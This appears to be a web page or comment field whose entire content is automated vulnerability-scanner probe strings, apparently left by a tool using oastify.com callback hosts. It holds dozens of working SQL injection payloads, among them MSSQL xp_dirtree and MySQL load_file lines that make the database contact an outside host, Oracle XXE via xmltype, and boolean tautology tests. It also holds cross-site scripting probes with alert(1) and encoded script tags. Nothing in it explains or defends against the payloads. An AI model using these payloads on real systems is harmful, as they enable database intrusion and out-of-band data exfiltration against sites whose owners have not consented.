COMMENT *’;declare @q varchar(99);set @q=’\\4gl5s921y0lfon8en5rnk5yq0h6auatykp8hv7jw.oasti’+’fy.com\aux’; exec master.dbo.xp_dirtree @q;–
COMMENT *);declare @q varchar(99);set @q=’\\4y35a9k1g03f6nqe559n25gqihoacaby2qqid81x.oasti’+’fy.com\kxf’; exec master.dbo.xp_dirtree @q;–
COMMENT *’);declare @q varchar(99);set @q=’\\vedwq00swrj6me65lwpeiwwhy841s1rpii6at0hp.oasti’+’fy.com\xjy’; exec master.dbo.xp_dirtree @q;–
(select load_file(‘\\\\zcf0o4ywuvhaki49j0nig0ulwc25q5ptgv4nrdf2.oastify.com\\pui’))
COMMENT *’+(select load_file(‘\\\\jm9kyo8g4fruu2ettkx2qk456wcp0pzdqge81ypn.oastify.com\\dpy’))+’
(select extractvalue(xmltype(‘<!DOCTYPE root [ %czqvv;]>’),’/l’) from dual)
COMMENT *’||(select extractvalue(xmltype(‘<!DOCTYPE root [ %czqvv;]>’),’/l’) from dual)||’
COMMENT *;declare @q varchar(99);set @q=’\\a9kblfv7r6elht1kgbktdbrwtnzgngm4du1mocc1.oasti’+’fy.com\bng’; exec master.dbo.xp_dirtree @q;–
COMMENT *’;declare @q varchar(99);set @q=’\\8fo9rd15x4kjnr7im9qrj9xuzl5etes2jt7lubi0.oasti’+’fy.com\dqz’; exec master.dbo.xp_dirtree @q;–
COMMENT *);declare @q varchar(99);set @q=’\\9pza1eb675ukxshjwa0sta7v9mff3f23tvhn4ds2.oasti’+’fy.com\aao’; exec master.dbo.xp_dirtree @q;–
COMMENT *’);declare @q varchar(99);set @q=’\\7hp8tc34z3mipq9ho8sql8zt1k7dvdu1lu9mwck1.oasti’+’fy.com\fti’; exec master.dbo.xp_dirtree @q;–
(select load_file(‘\\\\3w0488i0ez1e4mod347m04epggm9a99x0zorbhz6.oastify.com\\mzd’))
COMMENT *’+(select load_file(‘\\\\6u176bg3c2zh2pmg175py7csejkc8c70y3mv9lxa.oastify.com\\cuv’))+’
(select extractvalue(xmltype(‘<!DOCTYPE root [ %laicm;]>’),’/l’) from dual)
COMMENT *’||(select extractvalue(xmltype(‘<!DOCTYPE root [ %laicm;]>’),’/l’) from dual)||’
COMMENT *;declare @q varchar(99);set @q=’\\wggxs12tysl7of86nxrfkxyi0962u2tqkg88vyjn.oasti’+’fy.com\wjd’; exec master.dbo.xp_dirtree @q;–
COMMENT *’;declare @q varchar(99);set @q=’\\pqjq2ucm8lv0y8izxq18uq8ba2gv4v3juai25sth.oasti’+’fy.com\ewr’; exec master.dbo.xp_dirtree @q;–
COMMENT *);declare @q varchar(99);set @q=’\\gbvhnlxdtcgrjz3qihmzfht2vt1mpmoaf23uqke9.oasti’+’fy.com\cpf’; exec master.dbo.xp_dirtree @q;–
COMMENT *’);declare @q varchar(99);set @q=’\\wiixu14t0sn7qfa6pxtfmx0i2982w2vqmjabx1lq.oasti’+’fy.com\zjp’; exec master.dbo.xp_dirtree @q;–
(select load_file(‘\\\\n5tohsrknjayd6xxcog69on9p0vtjtih9jxbk18q.oastify.com\\kmx’))
COMMENT *’+(select load_file(‘\\\\deveqi0aw9jomw6nlepwiewzyq4jsjr7ia62tshh.oastify.com\\hew’))+’
(select extractvalue(xmltype(‘<!DOCTYPE root [ %fuoxp;]>’),’/l’) from dual)
COMMENT *’||(select extractvalue(xmltype(‘<!DOCTYPE root [ %fuoxp;]>’),’/l’) from dual)||’
COMMENT *;declare @q varchar(99);set @q=’\\2jm3v75z1yodrlbcq3uln31o3f98x8wwnmbey4mt.oasti’+’fy.com\ock’; exec master.dbo.xp_dirtree @q;–
COMMENT *’;declare @q varchar(99);set @q=’\\0hi1t53xzwmbpj9ao1sjl1zm1d76v6uull9dw3ks.oasti’+’fy.com\wdk’; exec master.dbo.xp_dirtree @q;–
COMMENT *);declare @q varchar(99);set @q=’\\whhxt13tzsm7pf96oxsflxzi1972v2uqli9aw0kp.oasti’+’fy.com\qgb’; exec master.dbo.xp_dirtree @q;–
COMMENT *’);declare @q varchar(99);set @q=’\\5hn6ta32z1mgpo9fo6sol6zr1i7bvbuzls9kwakz.oasti’+’fy.com\shm’; exec master.dbo.xp_dirtree @q;–
(select load_file(‘\\\\9z9abel6h54k7srj6aas3ahvjmpfdfc335rxen2c.oastify.com\\zbz’))
COMMENT *’+(select load_file(‘\\\\6047cbm3i25h8psg77bp47iskjqcecd043svfl3a.oastify.com\\hog’))+’
COMMENT *73101400′ or ‘2055’=’2055
COMMENT *95372481′ or ‘3480’=’3485
COMMENT *28734141′ or ‘4394’=’4394
COMMENT *52444502′ or ‘1574’=’1574′
COMMENT *40443489′ or 1994=1994–
COMMENT *70451452′ or 2130=2134–
COMMENT *64279654′ or 2111=2111–
COMMENT *43214873′ or 3626=3626′–
COMMENT *’ and ‘2630’=’2630
COMMENT *’ and ‘6160’=’6162
COMMENT *’ and ‘3626’=’3626
COMMENT *’ and ‘8440’=’8440′
COMMENT *’ and 5255=5255–
COMMENT *’ and 1618=1626–
COMMENT *’ and 3521=3521–
COMMENT *’ and 2085=2085′–
w7gbuohbg3
COMMENT *qy56absbu7
4pqxyjub5cmhhmb9q6my
c48oifkomw%41kgfkha6948
sc96e8rq93\\l87b2hegiu
y9fc7udekfAxg82e8eo0m
y9fc7udekfAxg82e8eo0m
COMMENT *hq4rer3pknk905ubojq7
COMMENT *kqwoplofoh%41k0pmddq6f6
COMMENT *grsheczfw4\\lrpmn3eo75
COMMENT *nvqkzgyt3nA5jras6xguv
COMMENT *nvqkzgyt3nA5jras6xguv
COMMENT *m762gm25ge
COMMENT *itkndalert(1)tt3mq
COMMENT *itkndalert(1)tt3mq
COMMENT *itknd%3cscript%3ealert%281%29%3c%2fscript%3ett3mq
COMMENT *itkndalert(1)tt3mq
COMMENT *woniualert(1)qusjt
COMMENT *woniualert(1)qusjt
COMMENT *woniu%3cScRiPt%3ealert%281%29%3c%2fScRiPt%3equsjt
COMMENT *woniualert(1)qusjt
COMMENT *arh2ije5h7
COMMENT *arh2ije5h7
COMMENT *arh2i%3ca%20b%3dc%3eje5h7
COMMENT *arh2ije5h7
(select extractvalue(xmltype(‘<!DOCTYPE root [ %ptvgp;]>’),’/l’) from dual)
COMMENT *’||(select extractvalue(xmltype(‘<!DOCTYPE root [ %ptvgp;]>’),’/l’) from dual)||’
COMMENT *;declare @q varchar(99);set @q=’\\h8qikmueqddsg00rfij0ciq3suynmnlbc10tnjb8.oasti’+’fy.com\qgl’; exec master.dbo.xp_dirtree @q;–
COMMENT *’;declare @q varchar(99);set @q=’\\itfj5nffbeyt11ls0j41xjb4dvjo7o6cx3lv8lwa.oasti’+’fy.com\dpx’; exec master.dbo.xp_dirtree @q;–
COMMENT *);declare @q varchar(99);set @q=’\\theuty3qzpm4pc93ouscluzf167zvzunlf97wxkm.oasti’+’fy.com\evw’; exec master.dbo.xp_dirtree @q;–
COMMENT *’);declare @q varchar(99);set @q=’\\grbh3ldd9cwrzzjqyh2zvh92bthm5m4av3jv6lua.oasti’+’fy.com\mlw’; exec master.dbo.xp_dirtree @q;–
(select load_file(‘\\\\dxee9ijaf92o5wpn4e8w1efzhqnjbja719p1cr0g.oastify.com\\fed’))
COMMENT *’+(select load_file(‘\\\\1vx276hydx0c3knb226kz2dnfel7978vzynqagy5.oastify.com\\bhe’))+’
COMMENT *82131630′ or ‘2896’=’2896
COMMENT *39904386′ or ‘3334’=’3335
COMMENT *90943857′ or 3904=3904–
COMMENT *97499211′ or 5750=5757–
COMMENT *’ and ‘7019’=’7019
COMMENT *’ and ‘9199’=’9205
COMMENT *’ and 1613=1613–
COMMENT *’ and 1255=1259–
l35u1s1pos
COMMENT *i6krzv6z98
(select extractvalue(xmltype(‘<!DOCTYPE root [ %pwosw;]>’),’/l’) from dual)
COMMENT *’||(select extractvalue(xmltype(‘<!DOCTYPE root [ %pwosw;]>’),’/l’) from dual)||’
COMMENT *;declare @q varchar(99);set @q=’\\vfewr01sxrk6ne75mwqejwxhz851t1spjf77uxim.oasti’+’fy.com\hci’; exec master.dbo.xp_dirtree @q;–
COMMENT *’;declare @q varchar(99);set @q=’\\eo6f0jab6atpwxgovfzxsf608rek2k18szgr3hr6.oasti’+’fy.com\nsy’; exec master.dbo.xp_dirtree @q;–
COMMENT *);declare @q varchar(99);set @q=’\\knblzp9h5gsvv3fuuly3rl567xdq1q0er6fy2oqd.oasti’+’fy.com\ybf’; exec master.dbo.xp_dirtree @q;–
COMMENT *’);declare @q varchar(99);set @q=’\\7rz83cd493wizqjhy82qv89tbkhd5d41vujm6cu1.oasti’+’fy.com\orq’; exec master.dbo.xp_dirtree @q;–
(select load_file(‘\\\\g7ohjltdpccrfzzqehizbhp2rtxmlmkabcz4muaj.oastify.com\\dsy’))
COMMENT *’+(select load_file(‘\\\\m5snhrrjniaxd5xwcng59nn8pzvsjsig9jxbk18q.oastify.com\\ood’))+’
(select extractvalue(xmltype(‘<!DOCTYPE root [ %zqlqq;]>’),’/l’) from dual)
COMMENT *’||(select extractvalue(xmltype(‘<!DOCTYPE root [ %zqlqq;]>’),’/l’) from dual)||’
COMMENT *;declare @q varchar(99);set @q=’\\ar5b3fd796wlztjkyb2tvb9wbnhg5g44vujm6cu1.oasti’+’fy.com\vbq’; exec master.dbo.xp_dirtree @q;–
COMMENT *’;declare @q varchar(99);set @q=’\\jl8kxo7g3fqut2dtskw2pk355wbpzpydp4dw0mob.oasti’+’fy.com\bli’; exec master.dbo.xp_dirtree @q;–
COMMENT *);declare @q varchar(99);set @q=’\\swst8xipeo134bo23t7b0teeg5myay9m0eo6bwzl.oasti’+’fy.com\exl’; exec master.dbo.xp_dirtree @q;–
COMMENT *’);declare @q varchar(99);set @q=’\\pxqq9ujmfl2058pz4q881qfbh2nvbvaj1cp4cu0j.oasti’+’fy.com\iin’; exec master.dbo.xp_dirtree @q;–
(select load_file(‘\\\\nh8ots3kzjmyp69xoos6loz9107tvtuhlj9bw1kq.oastify.com\\hkx’))
COMMENT *’+(select load_file(‘\\\\wddxp1ztvsi7lf56kxofhxvix932r2qqht5lsbg0.oastify.com\\rfz’))+’
(select extractvalue(xmltype(‘<!DOCTYPE root [ %jzaer;]>’),’/l’) from dual)
COMMENT *’||(select extractvalue(xmltype(‘<!DOCTYPE root [ %jzaer;]>’),’/l’) from dual)||’
COMMENT *;declare @q varchar(99);set @q=’\\j3nkfopglf8ub2vtake27kl5nwtphpgd73vvil6a.oasti’+’fy.com\pns’; exec master.dbo.xp_dirtree @q;–
COMMENT *’;declare @q varchar(99);set @q=’\\j2mkeoogkf7ua2ut9kd26kk5mwspgpfd64uwhm5b.oasti’+’fy.com\xtz’; exec master.dbo.xp_dirtree @q;–
COMMENT *);declare @q varchar(99);set @q=’\\xdeyp2zuvti8lg57kyoghyvjxa33r3qrhj5bs1gq.oasti’+’fy.com\qli’; exec master.dbo.xp_dirtree @q;–
COMMENT *’);declare @q varchar(99);set @q=’\\8179ddn5j46j9rti89cr59jullrefee25vtngd42.oasti’+’fy.com\bnc’; exec master.dbo.xp_dirtree @q;–
(select load_file(‘\\\\86c9ids5o4bjeryid9hra9ouqlwekej2a4ywlm9b.oastify.com\\jjp’))
COMMENT *’+(select load_file(‘\\\\2fi3r71zxykdnl7cm3qlj3xozf58t8swjz7ruhi6.oastify.com\\jhs’))+’
(select extractvalue(xmltype(‘<!DOCTYPE root [ %gbmez;]>’),’/l’) from dual)
COMMENT *’||(select extractvalue(xmltype(‘<!DOCTYPE root [ %gbmez;]>’),’/l’) from dual)||’
COMMENT *;declare @q varchar(99);set @q=’\\1872k6uyqxdcgk0bf2jkc2qnsey7m7lvcl0dn3bs.oasti’+’fy.com\qtx’; exec master.dbo.xp_dirtree @q;–
COMMENT *’;declare @q varchar(99);set @q=’\\7w488ci4e31i4qoh387q08etgkmdad910sokbazz.oasti’+’fy.com\myw’; exec master.dbo.xp_dirtree @q;–
COMMENT *);declare @q varchar(99);set @q=’\\5036cam2i15g8osf76bo46irkiqbebdz4rsjf93y.oasti’+’fy.com\bit’; exec master.dbo.xp_dirtree @q;–
COMMENT *’);declare @q varchar(99);set @q=’\\8r093dd594wjzrjiy92rv99ublhe5e42vvjn6du2.oasti’+’fy.com\dpf’; exec master.dbo.xp_dirtree @q;–
(select load_file(‘\\\\hyjiamkegd3s60qr5i902ig3iuoncnbb2dq5dv1k.oastify.com\\gqo’))
COMMENT *’+(select load_file(‘\\\\ccsdohy9u8hnkv4mjdnvgduywp2iqip6g941rrfg.oastify.com\\ueu’))+’
(select extractvalue(xmltype(‘<!DOCTYPE root [ %fbroo;]>’),’/l’) from dual)
COMMENT *’||(select extractvalue(xmltype(‘<!DOCTYPE root [ %fbroo;]>’),’/l’) from dual)||’
COMMENT *;declare @q varchar(99);set @q=’\\q0rrcvmnim5189s07rb94rick3qwewdk4as2fs3h.oasti’+’fy.com\qcu’; exec master.dbo.xp_dirtree @q;–
COMMENT *’;declare @q varchar(99);set @q=’\\s4xtgxqpmo93cbw2btfb8tmeo5uyiyhm8dw5jv7k.oasti’+’fy.com\nbu’; exec master.dbo.xp_dirtree @q;–
COMMENT *);declare @q varchar(99);set @q=’\\vsrw40esarx60ek5zw3ewwahc8i1615pwhk97zvo.oasti’+’fy.com\yfb’; exec master.dbo.xp_dirtree @q;–
COMMENT *’);declare @q varchar(99);set @q=’\\5kq6wa6221pgsocfr6voo62r4iabybxzosckzanz.oasti’+’fy.com\jni’; exec master.dbo.xp_dirtree @q;–
(select load_file(‘\\\\fo7g0kac6btqwygpvgzysg618sel2l19sbg33tri.oastify.com\\kcm’))
COMMENT *’+(select load_file(‘\\\\ii4jun4f0entq1aspjt1mj042v8owovcmfa7xxlm.oastify.com\\xaz’))+’
(select extractvalue(xmltype(‘<!DOCTYPE root [ %gmdgn;]>’),’/l’) from dual)
COMMENT *’||(select extractvalue(xmltype(‘<!DOCTYPE root [ %gmdgn;]>’),’/l’) from dual)||’
COMMENT *;declare @q varchar(99);set @q=’\\bn2czg9857smvuflucyurc5x7odh1h05rvfn2dq2.oasti’+’fy.com\axu’; exec master.dbo.xp_dirtree @q;–
COMMENT *’;declare @q varchar(99);set @q=’\\h3lifmpeld8sb0vraie07il3nutnhngb72vuik69.oasti’+’fy.com\zpd’; exec master.dbo.xp_dirtree @q;–
COMMENT *);declare @q varchar(99);set @q=’\\xijyu24u0tn8qga7pytgmy0j2a83w3vrmjabx1lq.oasti’+’fy.com\yng’; exec master.dbo.xp_dirtree @q;–
COMMENT *’);declare @q varchar(99);set @q=’\\as6b4fe7a6xl0tkkzb3twbawcnig6g54wxkp7fv4.oasti’+’fy.com\uqo’; exec master.dbo.xp_dirtree @q;–
(select load_file(‘\\\\pxqq9ujmfl2058pz4q881qfbh2nvbvaj1lpdc30s.oastify.com\\lxu’))
COMMENT *’+(select load_file(‘\\\\owop8tilek1z47oy3p770peag1muau9i0lodb3zs.oastify.com\\dyt’))+’
‘”>
javascript:/*
COMMENT *
COMMENT *
COMMENT *